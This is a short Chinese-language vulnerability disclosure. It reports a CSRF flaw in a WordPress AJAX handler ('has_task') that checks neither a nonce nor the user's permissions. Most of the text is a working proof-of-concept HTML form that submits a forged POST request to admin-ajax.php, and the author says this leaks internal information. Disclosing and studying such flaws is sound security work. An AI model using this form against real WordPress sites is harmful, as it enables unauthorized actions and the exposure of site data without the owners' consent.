由于没有对AJAX进行NONCE和权限的判断,从而导致CSRF漏洞
POC如下:
< html>
< body>
< form action="http://localhost/new/wp-admin/admin-ajax.php?action=has_task" method="POST" enctype="multipart/form-data">
< input type="hidden" name="task_name" value="room-floor">
< input type="submit" name="Submit">
< /form>
< /body>
< /html>
导致了一些内部信息的泄露